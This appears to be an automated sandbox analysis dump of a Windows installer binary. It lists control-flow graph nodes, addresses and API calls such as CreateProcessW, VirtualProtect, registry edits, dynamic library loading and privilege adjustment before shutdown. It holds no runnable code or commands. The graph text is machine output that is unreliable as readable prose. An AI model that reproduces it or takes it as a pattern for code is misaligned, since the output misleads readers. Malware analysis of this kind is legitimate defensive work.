5191->5192 5193 402c37 17 API calls 5192->5193 5194 401e8f 5193->5194 5195 402c37 17 API calls 5194->5195 5196 401e98 5195->5196 5197 401423 24 API calls 5196->5197 5198 401e9f 5197->5198 5205 4058aa ShellExecuteExW 5198->5205 5200 401ee1 5201 40670d 5 API calls 5200->5201 5203 402885 5200->5203 5202 401efb CloseHandle 5201->5202 5202->5203 5205->5200 5206 10002238 5207 10002296 5206->5207 5208 100022cc 5206->5208 5207->5208 5209 100022a8 GlobalAlloc 5207->5209 5209->5207 5210 40167b 5211 402c37 17 API calls 5210->5211 5212 401682 5211->5212 5213 402c37 17 API calls 5212->5213 5214 40168b 5213->5214 5215 402c37 17 API calls 5214->5215 5216 401694 MoveFileW 5215->5216 5217 4016a0 5216->5217 5218 4016a7 5216->5218 5219 401423 24 API calls 5217->5219 5220 4065c5 2 API calls 5218->5220 5222 40224a 5218->5222 5219->5222 5221 4016b6 5220->5221 5221->5222 5223 406048 36 API calls 5221->5223 5223->5217 5224 1000103d 5225 1000101b 5 API calls 5224->5225 5226 10001056 5225->5226 4844 40247e 4845 402c77 17 API calls 4844->4845 4846 402488 4845->4846 4847 402c37 17 API calls 4846->4847 4848 402491 4847->4848 4849 40249c RegQueryValueExW 4848->4849 4852 402885 4848->4852 4850 4024c2 RegCloseKey 4849->4850 4851 4024bc 4849->4851 4850->4852 4851->4850 4855 4061c9 wsprintfW 4851->4855 4855->4850 5227 4020fe 5228 402c37 17 API calls 5227->5228 5229 402105 5228->5229 5230 402c37 17 API calls 5229->5230 5231 40210f 5230->5231 5232 402c37 17 API calls 5231->5232 5233 402119 5232->5233 5234 402c37 17 API calls 5233->5234 5235 402123 5234->5235 5236 402c37 17 API calls 5235->5236 5237 40212d 5236->5237 5238 40216c CoCreateInstance 5237->5238 5239 402c37 17 API calls 5237->5239 5242 40218b 5238->5242 5239->5238 5240 401423 24 API calls 5241 40224a 5240->5241 5242->5240 5242->5241 5243 4019ff 5244 402c37 17 API calls 5243->5244 5245 401a06 5244->5245 5246 402c37 17 API calls 5245->5246 5247 401a0f 5246->5247 5248 401a16 lstrcmpiW 5247->5248 5249 401a28 lstrcmpW 5247->5249 5250 401a1c 5248->5250 5249->5250 3807 401f00 3822 402c37 3807->3822 3816 401f2b 3818 401f30 3816->3818 3819 401f3b 3816->3819 3817 402885 3847 4061c9 wsprintfW 3818->3847 3821 401f39 CloseHandle 3819->3821 3821->3817 3823 402c43 3822->3823 3848 4062a4 3823->3848 3826 401f06 3828 4052e6 3826->3828 3829 405301 3828->3829 3837 401f10 3828->3837 3830 40531d lstrlenW 3829->3830 3833 4062a4 17 API calls 3829->3833 3831 405346 3830->3831 3832 40532b lstrlenW 3830->3832 3835 405359 3831->3835 3836 40534c SetWindowTextW 3831->3836 3834 40533d lstrcatW 3832->3834 3832->3837 3833->3830 3834->3831 3835->3837 3838 40535f SendMessageW SendMessageW SendMessageW 3835->3838 3836->3835 3839 405867 CreateProcessW 3837->3839 3838->3837 3840 401f16 3839->3840 3841 40589a CloseHandle 3839->3841 3840->3817 3840->3821 3842 40670d WaitForSingleObject 3840->3842 3841->3840 3843 406727 3842->3843 3844 406739 GetExitCodeProcess 3843->3844 3890 406698 3843->3890 3844->3816 3847->3821 3849 4062b1 3848->3849 3850 4064fc 3849->3850 3853 4064ca lstrlenW 3849->3853 3856 4062a4 10 API calls 3849->3856 3857 4063df GetSystemDirectoryW 3849->3857 3859 4063f2 GetWindowsDirectoryW 3849->3859 3860 406516 5 API calls 3849->3860 3861 40646d lstrcatW 3849->3861 3862 406426 SHGetSpecialFolderLocation 3849->3862 3863 4062a4 10 API calls 3849->3863 3874 406150 3849->3874 3879 4061c9 wsprintfW 3849->3879 3880 406282 lstrcpynW 3849->3880 3851 402c64 3850->3851 3881 406282 lstrcpynW 3850->3881 3851->3826 3865 406516 3851->3865 3853->3849 3856->3853 3857->3849 3859->3849 3860->3849 3861->3849 3862->3849 3864 40643e SHGetPathFromIDListW CoTaskMemFree 3862->3864 3863->3849 3864->3849 3872 406523 3865->3872 3866 406599 3867 40659e CharPrevW 3866->3867 3869 4065bf 3866->3869 3867->3866 3868 40658c CharNextW 3868->3866 3868->3872 3869->3826 3871 406578 CharNextW 3871->3872 3872->3866 3872->3868 3872->3871 3873 406587 CharNextW 3872->3873 3886 405b80 3872->3886 3873->3868 3882 4060ef 3874->3882 3877 406184 RegQueryValueExW RegCloseKey 3878 4061b4 3877->3878 3878->3849 3879->3849 3880->3849 3881->3851 3883 4060fe 3882->3883 3884 406102 3883->3884 3885 406107 RegOpenKeyExW 3883->3885 3884->3877 3884->3878 3885->3884 3887 405b86 3886->3887 3888 405b9c 3887->3888 3889 405b8d CharNextW 3887->3889 3888->3872 3889->3887 3891 4066b5 PeekMessageW 3890->3891 3892 4066c5 WaitForSingleObject 3891->3892 3893 4066ab DispatchMessageW 3891->3893 3892->3843 3893->3891 5251 401000 5252 401037 BeginPaint GetClientRect 5251->5252 5253 40100c DefWindowProcW 5251->5253 5255 4010f3 5252->5255 5258 401179 5253->5258 5256 401073 CreateBrushIndirect FillRect DeleteObject 5255->5256 5257 4010fc 5255->5257 5256->5255 5259 401102 CreateFontIndirectW 5257->5259 5260 401167 EndPaint 5257->5260 5259->5260 5261 401112 6 API calls 5259->5261 5260->5258 5261->5260 4178 100027c2 4179 10002812 4178->4179 4180 100027d2 VirtualProtect 4178->4180 4180->4179 5262 401503 5263 40150b 5262->5263 5265 40151e 5262->5265 5264 402c15 17 API calls 5263->5264 5264->5265 4216 402306 4217 40230e 4216->4217 4220 402314 4216->4220 4218 402c37 17 API calls 4217->4218 4218->4220 4219 402322 4222 402330 4219->4222 4223 402c37 17 API calls 4219->4223 4220->4219 4221 402c37 17 API calls 4220->4221 4221->4219 4224 402c37 17 API calls 4222->4224 4223->4222 4225 402339 WritePrivateProfileStringW 4224->4225 5266 401f86 5267 402c37 17 API calls 5266->5267 5268 401f8d 5267->5268 5269 40665c 5 API calls 5268->5269 5270 401f9c 5269->5270 5271 401fb8 GlobalAlloc 5270->5271 5273 402020 5270->5273 5272 401fcc 5271->5272 5271->5273 5274 40665c 5 API calls 5272->5274 5275 401fd3 5274->5275 5276 40665c 5 API calls 5275->5276 5277 401fdd 5276->5277 5277->5273 5281 4061c9 wsprintfW 5277->5281 5279 402012 5282 4061c9 wsprintfW 5279->5282 5281->5279 5282->5273 4233 402388 4234 402390 4233->4234 4235 4023bb 4233->4235 4245 402c77 4234->4245 4237 402c37 17 API calls 4235->4237 4239 4023c2 4237->4239 4250 402cf5 4239->4250 4240 4023a1 4242 402c37 17 API calls 4240->4242 4243 4023a8 RegDeleteValueW RegCloseKey 4242->4243 4244 4023cf 4243->4244 4246 402c37 17 API calls 4245->4246 4247 402c8e 4246->4247 4248 4060ef RegOpenKeyExW 4247->4248 4249 402397 4248->4249 4249->4240 4249->4244 4251 402d0b 4250->4251 4252 402d21 4251->4252 4254 402d2a 4251->4254 4252->4244 4255 4060ef RegOpenKeyExW 4254->4255 4256 402d58 4255->4256 4257 402dd0 4256->4257 4258 402d5c 4256->4258 4257->4252 4259 402d7e RegEnumKeyW 4258->4259 4260 402d95 RegCloseKey 4258->4260 4261 402db6 RegCloseKey 4258->4261 4263 402d2a 6 API calls 4258->4263 4259->4258 4259->4260 4262 40665c 5 API calls 4260->4262 4261->4257 4264 402da5 4262->4264 4263->4258 4265 402dc4 RegDeleteKeyW 4264->4265 4266 402da9 4264->4266 4265->4257 4266->4257 5283 40190c 5284 401943 5283->5284 5285 402c37 17 API calls 5284->5285 5286 401948 5285->5286 5287 405990 67 API calls 5286->5287 5288 401951 5287->5288 5289 401d0e 5290 402c15 17 API calls 5289->5290 5291 401d15 5290->5291 5292 402c15 17 API calls 5291->5292 5293 401d21 GetDlgItem 5292->5293 5294 40258c 5293->5294 5295 1000164f 5296 10001516 GlobalFree 5295->5296 5298 10001667 5296->5298 5297 100016ad GlobalFree 5298->5297 5299 10001682 5298->5299 5300 10001699 VirtualFree 5298->5300 5299->5297 5300->5297 5301 40190f 5302 402c37 17 API calls 5301->5302 5303 401916 5302->5303 5304 4058e4 MessageBoxIndirectW 5303->5304 5305 40191f 5304->5305 5306 401491 5307 4052e6 24 API calls 5306->5307 5308 401498 5307->5308 5309 402592 5310 4025c1 5309->5310 5311 4025a6 5309->5311 5313 4025f5 5310->5313 5314 4025c6 5310->5314 5312 402c15 17 API calls 5311->5312 5320 4025ad 5312->5320 5316 402c37 17 API calls 5313->5316 5315 402c37 17 API calls 5314->5315 5317 4025cd WideCharToMultiByte lstrlenA 5315->5317 5318 4025fc lstrlenW 5316->5318 5317->5320 5318->5320 5319 402629 5321 405e26 WriteFile 5319->5321 5323 40263f 5319->5323 5320->5319 5322 405e55 5 API calls 5320->5322 5320->5323 5321->5323 5322->5319 5324 10001058 5326 10001074 5324->5326 5325 100010dd 5326->5325 5327 10001516 GlobalFree 5326->5327 5328 10001092 5326->5328 5327->5328 5329 10001516 GlobalFree 5328->5329 5330 100010a2 5329->5330 5331 100010b2 5330->5331 5332 100010a9 GlobalSize 5330->5332 5333 100010b6 GlobalAlloc 5331->5333 5334 100010c7 5331->5334 5332->5331 5335 1000153d 3 API calls 5333->5335 5336 100010d2 GlobalFree 5334->5336 5335->5334 5336->5325 5337 401c19 5338 402c15 17 API calls 5337->5338 5339 401c20 5338->5339 5340 402c15 17 API calls 5339->5340 5341 401c2d 5340->5341 5342 401c42 5341->5342 5343 402c37 17 API calls 5341->5343 5344 401c52 5342->5344 5347 402c37 17 API calls 5342->5347 5343->5342 5345 401ca9 5344->5345 5346 401c5d 5344->5346 5349 402c37 17 API calls 5345->5349 5348 402c15 17 API calls 5346->5348 5347->5344 5350 401c62 5348->5350 5351 401cae 5349->5351 5352 402c15 17 API calls 5350->5352 5353 402c37 17 API calls 5351->5353 5354 401c6e 5352->5354 5355 401cb7 FindWindowExW 5353->5355 5356 401c99 SendMessageW 5354->5356 5357 401c7b SendMessageTimeoutW 5354->5357 5358 401cd9 5355->5358 5356->5358 5357->5358 5359 402a9a SendMessageW 5360 402ab4 InvalidateRect 5359->5360 5361 402abf 5359->5361 5360->5361 5362 40281b 5363 402821 5362->5363 5364 402829 FindClose 5363->5364 5365 402abf 5363->5365 5364->5365 5366 40149e 5367 4022f1 5366->5367 5368 4014ac PostQuitMessage 5366->5368 5368->5367 5369 40469f 5370 4046d5 5369->5370 5371 4046af 5369->5371 5373 40427e 8 API calls 5370->5373 5372 404217 18 API calls 5371->5372 5374 4046bc SetDlgItemTextW 5372->5374 5375 4046e1 5373->5375 5374->5370 5376 100010e1 5377 10001111 5376->5377 5378 100011d8 GlobalFree 5377->5378 5379 100012ba 2 API calls 5377->5379 5380 100011d3 5377->5380 5381 100011f8 GlobalFree 5377->5381 5382 10001272 2 API calls 5377->5382 5383 10001164 GlobalAlloc 5377->5383 5384 100012e1 lstrcpyW 5377->5384 5385 100011c4 GlobalFree 5377->5385 5379->5377 5380->5378 5381->5377 5382->5385 5383->5377 5384->5377 5385->5377 5386 4015a3 5387 402c37 17 API calls 5386->5387 5388 4015aa SetFileAttributesW 5387->5388 5389 4015bc 5388->5389 5390 405425 5391 405446 GetDlgItem GetDlgItem GetDlgItem 5390->5391 5392 4055cf 5390->5392 5435 40424c SendMessageW 5391->5435 5394 405600 5392->5394 5395 4055d8 GetDlgItem CreateThread CloseHandle 5392->5395 5396 40562b 5394->5396 5397 405650 5394->5397 5398 405617 ShowWindow ShowWindow 5394->5398 5395->5394 5401 405665 ShowWindow 5396->5401 5402 40563f 5396->5402 5405 40568b 5396->5405 5403 40427e 8 API calls 5397->5403 5437 40424c SendMessageW 5398->5437 5399 4054b6 5404 4054bd GetClientRect GetSystemMetrics SendMessageW SendMessageW 5399->5404 5409 405685 5401->5409 5410 405677 5401->5410 5407 4041f0 SendMessageW 5402->5407 5408 40565e 5403->5408 5411 40552b 5404->5411 5412 40550f SendMessageW SendMessageW 5404->5412 5405->5397 5406 405699 SendMessageW 5405->5406 5406->5408 5413 4056b2 CreatePopupMenu 5406->5413 5407->5397 5417 4041f0 SendMessageW 5409->5417 5416 4052e6 24 API calls 5410->5416 5414 405530 SendMessageW 5411->5414 5415 40553e 5411->5415 5412->5411 5418 4062a4 17 API calls 5413->5418 5414->5415 5419 404217 18 API calls 5415->5419 5416->5409 5417->5405 5420 4056c2 AppendMenuW 5418->5420 5421 40554e 5419->5421 5422 4056f2 TrackPopupMenu 5420->5422 5423 4056df GetWindowRect 5420->5423 5424 405557 ShowWindow 5421->5424 5425 40558b GetDlgItem SendMessageW 5421->5425 5422->5408 5426 40570d 5422->5426 5423->5422 5427 40556d ShowWindow 5424->5427 5430 40557a 5424->5430 5425->5408 5428 4055b2 SendMessageW SendMessageW 5425->5428 5429 405729 SendMessageW 5426->5429 5427->5430 5428->5408 5429->5429 5431 405746 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5429->5431 5436 40424c SendMessageW 5430->5436 5433 40576b SendMessageW 5431->5433 5433->5433 5434 405794 GlobalUnlock SetClipboardData CloseClipboard 5433->5434 5434->5408 5435->5399 5436->5425 5437->5396 5438 4028a7 5439 402c37 17 API calls 5438->5439 5440 4028b5 5439->5440 5441 4028cb 5440->5441 5443 402c37 17 API calls 5440->5443 5442 405d4f 2 API calls 5441->5442 5444 4028d1 5442->5444 5443->5441 5466 405d74 GetFileAttributesW CreateFileW 5444->5466 5446 4028de 5447 402981 5446->5447 5448 4028ea GlobalAlloc 5446->5448 5451 402989 DeleteFileW 5447->5451 5452 40299c 5447->5452 5449 402903 5448->5449 5450 402978 CloseHandle 5448->5450 5467 40332b SetFilePointer 5449->5467 5450->5447 5451->5452 5454 402909 5455 403315 ReadFile 5454->5455 5456 402912 GlobalAlloc 5455->5456 5457 402922 5456->5457 5458 402956 5456->5458 5460 4030fa 31 API calls 5457->5460 5459 405e26 WriteFile 5458->5459 5461 402962 GlobalFree 5459->5461 5465 40292f 5460->5465 5462 4030fa 31 API calls 5461->5462 5464 402975 5462->5464 5463 40294d GlobalFree 5463->5458 5464->5450 5465->5463 5466->5446 5467->5454 4276 4058aa ShellExecuteExW 5468 40432b lstrcpynW lstrlenW 4277 40202c 4278 40203e 4277->4278 4288 4020f0 4277->4288 4279 402c37 17 API calls 4278->4279 4281 402045 4279->4281 4280 401423 24 API calls 4284 40224a 4280->4284 4282 402c37 17 API calls 4281->4282 4283 40204e 4282->4283 4285 402064 LoadLibraryExW 4283->4285 4286 402056 GetModuleHandleW 4283->4286 4287 402075 4285->4287 4285->4288 4286->4285 4286->4287 4300 4066cb WideCharToMultiByte 4287->4300 4288->4280 4291 402086 4294 4020a5 4291->4294 4295 40208e 4291->4295 4292 4020bf 4293 4052e6 24 API calls 4292->4293 4296 402096 4293->4296 4303 10001759 4294->4303 4297 401423 24 API calls 4295->4297 4296->4284 4298 4020e2 FreeLibrary 4296->4298 4297->4296 4298->4284 4301 4066f5 GetProcAddress 4300->4301 4302 402080 4300->4302 4301->4302 4302->4291 4302->4292 4304 10001789 4303->4304 4345 10001b18 4304->4345 4306 10001790 4307 100018a6 4306->4307 4308 100017a1 4306->4308 4309 100017a8 4306->4309 4307->4296 4393 10002286 4308->4393 4377 100022d0 4309->4377 4314 1000180c 4320 10001812 4314->4320 4321 1000184e 4314->4321 4315 100017ee 4406 100024a4 4315->4406 4316 100017d7 4330 100017cd 4316->4330 4403 10002b57 4316->4403 4317 100017be 4319 100017c4 4317->4319 4323 100017cf 4317->4323 4319->4330 4387 1000289c 4319->4387 4325 100015b4 3 API calls 4320->4325 4327 100024a4 10 API calls 4321->4327 4322 100017f4 4417 100015b4 4322->4417 4397 10002640 4323->4397 4332 10001828 4325->4332 4328 10001840 4327->4328 4344 10001895 4328->4344 4428 10002467 4328->4428 4330->4314 4330->4315 4335 100024a4 10 API calls 4332->4335 4334 100017d5 4334->4330 4335->4328 4339 1000189f GlobalFree 4339->4307 4341 10001881 4341->4344 4432 1000153d wsprintfW 4341->4432 4342 1000187a FreeLibrary 4342->4341 4344->4307 4344->4339 4435 1000121b GlobalAlloc 4345->4435 4347 10001b3c 4436 1000121b GlobalAlloc 4347->4436 4349 10001d7a GlobalFree GlobalFree GlobalFree 4350 10001d97 4349->4350 4367 10001de1 4349->4367 4351 100020ee 4350->4351 4360 10001dac 4350->4360 4350->4367 4353 10002110 GetModuleHandleW 4351->4353 4351->4367 4352 10001c1d GlobalAlloc 4372 10001b47 4352->4372 4355 10002121 LoadLibraryW 4353->4355 4356 10002136 4353->4356 4354 10001c86 GlobalFree 4354->4372 4355->4356 4355->4367 4443 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4356->4443 4357 10001c68 lstrcpyW 4358 10001c72 lstrcpyW 4357->4358 4358->4372 4360->4367 4439 1000122c 4360->4439 4361 10002188 4362 10002195 lstrlenW 4361->4362 4361->4367 4444 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4362->4444 4364 10002048 4364->4367 4369 10002090 lstrcpyW 4364->4369 4367->4306 4368 10002148 4368->4361 4376 10002172 GetProcAddress 4368->4376 4369->4367 4370 10001cc4 4370->4372 4437 1000158f GlobalSize GlobalAlloc 4370->4437 4371 10001f37 GlobalFree 4371->4372 4372->4349 4372->4352 4372->4354 4372->4357 4372->4358 4372->4364 4372->4367 4372->4370 4372->4371 4375 1000122c 2 API calls 4372->4375 4442 1000121b GlobalAlloc 4372->4442 4373 100021af 4373->4367 4375->4372 4376->4361 4385 100022e8 4377->4385 4379 10002410 GlobalFree 4382 100017ae 4379->4382 4379->4385 4380 100023ba GlobalAlloc 4383 100023d1 4380->4383 4381 1000238f GlobalAlloc WideCharToMultiByte 4381->4379 4382->4316 4382->4317 4382->4330 4383->4379 4450 100025d4 4383->4450 4384 1000122c GlobalAlloc lstrcpynW 4384->4385 4385->4379 4385->4380 4385->4381 4385->4383 4385->4384 4446 100012ba 4385->4446 4388 100028ae 4387->4388 4389 10002953 SetFilePointer 4388->4389 4390 10002971 4389->4390 4391 10002a62 GetLastError 4390->4391 4392 10002a6d 4390->4392 4391->4392 4392->4330 4394 10002296 4393->4394 4395 100017a7 4393->4395 4394->4395 4396 100022a8 GlobalAlloc 4394->4396 4395->4309 4396->4394 4401 1000265c 4397->4401 4398 100026c0 4400 100026c5 GlobalSize 4398->4400 4402 100026cf 4398->4402 4399 100026ad GlobalAlloc 4399->4402 4400->4402 4401->4398 4401->4399 4402->4334 4404 10002b62 4403->4404 4405 10002ba2 GlobalFree 4404->4405 4453 1000121b GlobalAlloc 4406->4453 4408 10002506 MultiByteToWideChar 4412 100024ae 4408->4412 4409 1000252b StringFromGUID2 4409->4412 4410 1000253c lstrcpynW 4410->4412 4411 1000254f wsprintfW 4411->4412 4412->4408 4412->4409 4412->4410 4412->4411 4413 1000256c GlobalFree 4412->4413 4414 100025a7 GlobalFree 4412->4414 4415 10001272 2 API calls 4412->4415 4454 100012e1 4412->4454 4413->4412 4414->4322 4415->4412 4458 1000121b GlobalAlloc 4417->4458 4419 100015ba 4420 100015c7 lstrcpyW 4419->4420 4422 100015e1 4419->4422 4423 100015fb 4420->4423 4422->4423 4424 100015e6 wsprintfW 4422->4424 4425 10001272 4423->4425 4424->4423 4426 100012b5 GlobalFree 4425->4426 4427 1000127b GlobalAlloc lstrcpynW 4425->4427 4426->4328 4427->4426 4429 10002475 4428->4429 4431 10001861 4428->4431 4430 10002491 GlobalFree 4429->4430 4429->4431 4430->4429 4431->4341 4431->4342 4433 10001272 2 API calls 4432->4433 4434 1000155e 4433->4434 4434->4344 4435->4347 4436->4372 4438 100015ad 4437->4438 4438->4370 4445 1000121b GlobalAlloc 4439->4445 4441 1000123b lstrcpynW 4441->4367 4442->4372 4443->4368 4444->4373 4445->4441 4447 100012c1 4446->4447 4448 1000122c 2 API calls 4447->4448 4449 100012df 4448->4449 4449->4385 4451 100025e2 VirtualAlloc 4450->4451 4452 10002638 4450->4452 4451->4452 4452->4383 4453->4412 4455 100012ea 4454->4455 4456 1000130c 4454->4456 4455->4456 4457 100012f0 lstrcpyW 4455->4457 4456->4412 4457->4456 4458->4419 5469 402a2f 5470 402c15 17 API calls 5469->5470 5471 402a35 5470->5471 5472 402a6c 5471->5472 5474 402885 5471->5474 5475 402a47 5471->5475 5473 4062a4 17 API calls 5472->5473 5472->5474 5473->5474 5475->5474 5477 4061c9 wsprintfW 5475->5477 5477->5474 5478 401a30 5479 402c37 17 API calls 5478->5479 5480 401a39 ExpandEnvironmentStringsW 5479->5480 5481 401a4d 5480->5481 5483 401a60 5480->5483 5482 401a52 lstrcmpW 5481->5482 5481->5483 5482->5483 5489 401db3 GetDC 5490 402c15 17 API calls 5489->5490 5491 401dc5 GetDeviceCaps MulDiv ReleaseDC 5490->5491 5492 402c15 17 API calls 5491->5492 5493 401df6 5492->5493 5494 4062a4 17 API calls 5493->5494 5495 401e33 CreateFontIndirectW 5494->5495 5496 40258c 5495->5496 5497 4043b4 5498 4044e6 5497->5498 5500 4043cc 5497->5500 5499 404550 5498->5499 5501 40461a 5498->5501 5506 404521 GetDlgItem SendMessageW 5498->5506 5499->5501 5502 40455a GetDlgItem 5499->5502 5503 404217 18 API calls 5500->5503 5508 40427e 8 API calls 5501->5508 5504 404574 5502->5504 5505 4045db 5502->5505 5507 404433 5503->5507 5504->5505 5510 40459a SendMessageW LoadCursorW SetCursor 5504->5510 5505->5501 5511 4045ed 5505->5511 5530 404239 EnableWindow 5506->5530 5513 404217 18 API calls 5507->5513 5509 404615 5508->5509 5531 404663 5510->5531 5515 404603 5511->5515 5516 4045f3 SendMessageW 5511->5516 5518 404440 CheckDlgButton 5513->5518 5515->5509 5520 404609 SendMessageW 5515->5520 5516->5515 5517 40454b 5521 40463f SendMessageW 5517->5521 5528 404239 EnableWindow 5518->5528 5520->5509 5521->5499 5523 40445e GetDlgItem 5529 40424c SendMessageW 5523->5529 5525 404474 SendMessageW 5526 404491 GetSysColor 5525->5526 5527 40449a SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5525->5527 5526->5527 5527->5509 5528->5523 5529->5525 5530->5517 5534 4058aa ShellExecuteExW 5531->5534 5533 4045c9 LoadCursorW SetCursor 5533->5505 5534->5533 5535 402835 5536 40283d 5535->5536 5537 402841 FindNextFileW 5536->5537 5538 402853 5536->5538 5537->5538 5540 4029e0 5538->5540 5541 406282 lstrcpynW 5538->5541 5541->5540 5542 401735 5543 402c37 17 API calls 5542->5543 5544 40173c SearchPathW 5543->5544 5545 4029e0 5544->5545 5546 401757 5544->5546 5546->5545 5548 406282 lstrcpynW 5546->5548 5548->5545 5549 10002a77 5550 10002a8f 5549->5550 5551 1000158f 2 API calls 5550->5551 5552 10002aaa 5551->5552 5553 4014b8 5554 4014be 5553->5554 5555 401389 2 API calls 5554->5555 5556 4014c6 5555->5556 5557 404a3c 5558 404a68 5557->5558 5559 404a4c 5557->5559 5561 404a9b 5558->5561 5562 404a6e SHGetPathFromIDListW 5558->5562 5568 4058c8 GetDlgItemTextW 5559->5568 5564 404a85 SendMessageW 5562->5564 5565 404a7e 5562->5565 5563 404a59 SendMessageW 5563->5558 5564->5561 5566 40140b 2 API calls 5565->5566 5566->5564 5568->5563 4856 403d3e 4857 403e91 4856->4857 4858 403d56 4856->4858 4860 403ea2 GetDlgItem GetDlgItem 4857->4860 4861 403ee2 4857->4861 4858->4857 4859 403d62 4858->4859 4862 403d80 4859->4862 4863 403d6d SetWindowPos 4859->4863 4864 404217 18 API calls 4860->4864 4865 403f3c 4861->4865 4874 401389 2 API calls 4861->4874 4867 403d85 ShowWindow 4862->4867 4868 403d9d 4862->4868 4863->4862 4869 403ecc SetClassLongW 4864->4869 4866 404263 SendMessageW 4865->4866 4870 403e8c 4865->4870 4897 403f4e 4866->4897 4867->4868 4871 403da5 DestroyWindow 4868->4871 4872 403dbf 4868->4872 4873 40140b 2 API calls 4869->4873 4875 4041c1 4871->4875 4876 403dc4 SetWindowLongW 4872->4876 4877 403dd5 4872->4877 4873->4861 4878 403f14 4874->4878 4875->4870 4885 4041d1 ShowWindow 4875->4885 4876->4870 4882 403de1 GetDlgItem 4877->4882 4883 403e7e 4877->4883 4878->4865 4879 403f18 SendMessageW 4878->4879 4879->4870 4880 40140b 2 API calls 4880->4897 4881 4041a2 DestroyWindow EndDialog 4881->4875 4886 403e11 4882->4886 4887 403df4 SendMessageW IsWindowEnabled 4882->4887 4884 40427e 8 API calls 4883->4884 4884->4870 4885->4870 4889 403e1e 4886->4889 4890 403e65 SendMessageW 4886->4890 4891 403e31 4886->4891 4900 403e16 4886->4900 4887->4870 4887->4886 4888 4062a4 17 API calls 4888->4897 4889->4890 4889->4900 4890->4883 4894 403e39 4891->4894 4895 403e4e 4891->4895 4893 404217 18 API calls 4893->4897 4898 40140b 2 API calls 4894->4898 4899 40140b 2 API calls 4895->4899 4896 403e4c 4896->4883 4897->4870 4897->4880 4897->4881 4897->4888 4897->4893 4902 404217 18 API calls 4897->4902 4918 4040e2 DestroyWindow 4897->4918 4898->4900 4901 403e55 4899->4901 4931 4041f0 4900->4931 4901->4883 4901->4900 4903 403fc9 GetDlgItem 4902->4903 4904 403fe6 ShowWindow KiUserCallbackDispatcher 4903->4904 4905 403fde 4903->4905 4928 404239 EnableWindow 4904->4928 4905->4904 4907 404010 EnableWindow 4912 404024 4907->4912 4908 404029 GetSystemMenu EnableMenuItem SendMessageW 4909 404059 SendMessageW 4908->4909 4908->4912 4909->4912 4911 403d1f 18 API calls 4911->4912 4912->4908 4912->4911 4929 40424c SendMessageW 4912->4929 4930 406282 lstrcpynW 4912->4930 4914 404088 lstrlenW 4915 4062a4 17 API calls 4914->4915 4916 40409e SetWindowTextW 4915->4916 4917 401389 2 API calls 4916->4917 4917->4897 4918->4875 4919 4040fc CreateDialogParamW 4918->4919 4919->4875 4920 40412f 4919->4920 4921 404217 18 API calls 4920->4921 4922 40413a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4921->4922 4923 401389 2 API calls 4922->4923 4924 404180 4923->4924 4924->4870 4925 404188 ShowWindow 4924->4925 4926 404263 SendMessageW 4925->4926 4927 4041a0 4926->4927 4927->4875 4928->4907 4929->4912 4930->4914 4932 4041f7 4931->4932 4933 4041fd SendMessageW 4931->4933 4932->4933 4933->4896

                                                Executed Functions

                                                Function 00403373 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412stringfilecomCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 403373-4033b0 SetErrorMode GetVersion 1 4033b2-4033ba call 40665c 0->1 2 4033c3 0->2 1->2 7 4033bc 1->7 3 4033c8-4033dc call 4065ec lstrlenA 2->3 9 4033de-4033fa call 40665c * 3 3->9 7->2 16 40340b-40346c #17 OleInitialize SHGetFileInfoW call 406282 GetCommandLineW call 406282 GetModuleHandleW 9->16 17 4033fc-403402 9->17 24 403476-403490 call 405b80 CharNextW 16->24 25 40346e-403475 16->25 17->16 21 403404 17->21 21->16 28 403496-40349c 24->28 29 4035a7-4035c1 GetTempPathW call 403342 24->29 25->24 31 4034a5-4034a9 28->31 32 40349e-4034a3 28->32 36 4035c3-4035e1 GetWindowsDirectoryW lstrcatW call 403342 29->36 37 403619-403633 DeleteFileW call 402ec1 29->37 34 4034b0-4034b4 31->34 35 4034ab-4034af 31->35 32->31 32->32 38 403573-403580 call 405b80 34->38 39 4034ba-4034c0 34->39 35->34 36->37 54 4035e3-403613 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403342 36->54 57 4036e4-4036f4 call 4038b6 OleUninitialize 37->57 58 403639-40363f 37->58 55 403582-403583 38->55 56 403584-40358a 38->56 40 4034c2-4034ca 39->40 41 4034db-403514 39->41 45 4034d1 40->45 46 4034cc-4034cf 40->46 47 403531-40356b 41->47 48 403516-40351b 41->48 45->41 46->41 46->45 47->38 53 40356d-403571 47->53 48->47 52 40351d-403525 48->52 62 403527-40352a 52->62 63 40352c 52->63 53->38 64 403592-4035a0 call 406282 53->64 54->37 54->57 55->56 56->28 66 403590 56->66 75 40381a-403820 57->75 76 4036fa-40370a call 4058e4 ExitProcess 57->76 59 4036d4-4036db call 403990 58->59 60 403645-403650 call 405b80 58->60 74 4036e0 59->74 77 403652-403687 60->77 78 40369e-4036a8 60->78 62->47 62->63 63->47 67 4035a5 64->67 66->67 67->29 74->57 80 403822-403838 GetCurrentProcess OpenProcessToken 75->80 81 40389e-4038a6 75->81 82 403689-40368d 77->82 85 403710-403724 call 40584f lstrcatW 78->85 86 4036aa-4036b8 call 405c5b 78->86 88 40383a-403868 LookupPrivilegeValueW AdjustTokenPrivileges 80->88 89 40386e-40387c call 40665c 80->89 83 4038a8 81->83 84 4038ac-4038b0 ExitProcess 81->84 90 403696-40369a 82->90 91 40368f-403694 82->91 83->84 102 403731-40374b lstrcatW lstrcmpiW 85->102 103 403726-40372c lstrcatW 85->103 86->57 101 4036ba-4036d0 call 406282 * 2 86->101 88->89 99 40388a-403895 ExitWindowsEx 89->99 100 40387e-403888 89->100 90->82 96 40369c 90->96 91->90 91->96 96->78 99->81 104 403897-403899 call 40140b 99->104 100->99 100->104 101->59 102->57 106 40374d-403750 102->106 103->102 104->81 107 403752-403757 call 4057b5 106->107 108 403759 call 405832 106->108 117 40375e-40376c SetCurrentDirectoryW 107->117 108->117 118 403779-4037a2 call 406282 117->118 119 40376e-403774 call 406282 117->119 123 4037a7-4037c3 call 4062a4 DeleteFileW 118->123 119->118 126 403804-40380c 123->126 127 4037c5-4037d5 CopyFileW 123->127 126->123 128 40380e-403815 call 406048 126->128 127->126 129 4037d7-4037f7 call 406048 call 4062a4 call 405867 127->129 